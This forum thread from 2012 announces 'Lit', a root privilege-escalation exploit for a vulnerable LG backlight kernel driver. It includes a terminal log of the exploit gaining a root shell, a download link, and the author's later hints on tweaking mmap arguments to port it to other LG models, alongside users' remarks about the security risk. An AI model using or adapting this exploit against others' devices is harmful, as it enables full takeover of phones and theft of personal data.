Root Privilege Escalation exploit in LG's backlight driver

Discussion in 'Android Devices' started by giantpune, Oct 25, 2012.

  1. giantpune

    giantpune Well-Known Member
    So yesterday I was messing around with trying to get cm7 working when I ran an innocent shell command and my phone crashed. I tracked the cause back to the driver for the backlight in our LCD screen. While I was looking at it, I saw that the bug I found could actually be used to gain root access on our phone from any app that runs.

    It took a couple of hours to work up a working example for this that did something besides crash the phone, and I named it 'Lit'. I already have quite a few root exploits for our phone saved up in case LG decides to fix the ones we have publicly. So there's nothing really to lose by not keeping this one to myself.

    I suspect this one also affects other LG phones using the same buggy backlight driver. I have hardcoded an address in this code. To get it working on other models, somebody would need to get the correct address. Lit is a command-line program, so run it from the terminal emulator or adb or something and hopefully it'll give you a root shell. You might also want to contact LG and demand they fix it. I'm not really going to bother with that since I called and emailed them back in July about another one and got ignored.

    Code (Text):
    j@media-pc:~$ adb shell
    $ uname -a
    Linux localhost 2.6.35.11 #1 PREEMPT Tue Jun 19 23:02:28 KST 2012 armv7l GNU/Linux
    $ getprop | grep device
    [ro.product.device]: [m3s]
    $ id
    uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
    $ /data/local/tmp/lit
    Lit - root exploit for the LG LM3530 backlight driver
    2012 giantpune
    [+] Using 29287461 as adapter address
    [+] Opened led reg file
    [+] Mapped 29287000
    [+] algoAddr is at 29287000
    [+] got root
    # id
    uid=0(root) gid=0(root)
    #
    Download lit.tar.gz from Sendspace.com
     

  2. kwknott

    kwknott Well-Known Member
    Geez, you're finding more holes in this phone than Swiss cheese :D
     
  3. Curtis1973

    Curtis1973 Well-Known Member
    this phone doesn't have holes..it has BLACKHOLES lol
     
  4. HaTrEd360

    HaTrEd360 Well-Known Member
    Lmfao xD
     
  5. ktb83

    ktb83 Well-Known Member
    If any app can exploit a hole like this one, then Google Wallet has no business being on this phone. :D
     
  6. giantpune

    giantpune Well-Known Member
    With multiple holes like this one, I wouldn't put my email address, credit card info, or any other personal information into this phone. If it wasn't a prepaid phone, I'd say to check your account every now and then and make sure there aren't any strange 1900 calls or texts sent to those premium numbers that charge you $2 a message.

    With any app being able to get root access whenever it wants, they can most certainly do all this stuff. Definitely make sure you only install apps from trusted places. It would be trivial to stick this or a similar exploit into Angry Birds and toss it up on thepiratebay, and before you know it, your phone becomes somebody else's phone.
     
  7. lphy

    lphy Member
    giantpune, thanks for this great tool.

    I am very curious about this small program you wrote. How do I re-compile main.c (if I want to make some changes and try it)?

    What kind of tools did you use to compile it?

    Thanks
     
  8. giantpune

    giantpune Well-Known Member
    I used the gcc ARM compiler from NDK r8(ish) to make the binary. As far as modifications go, I've found that if you tweak the mmap arguments a bit to get rid of the unnecessary executable permission, the mmap will succeed on some other devices and this exploit works. There are actually about 8 different backlight drivers from LG affected by this one, being used in several models. My root/cwm installer for the L38c family of phones uses it ( http://androidforums.com/l3-all-things-root/682486-root-apk-l38c.html ).

    The Optimus V's backlight driver is also vulnerable, but as the CPU+kernel config is set up in a way that doesn't let us run unaligned addresses, the kernel panics rather than executing the specified address.
     
  9. lphy

    lphy Member
    giantpune,

    Thanks a bunch for this useful information. I will start playing with the compiler to see whether I can compile it to run on my phone.

    Thanks again
     
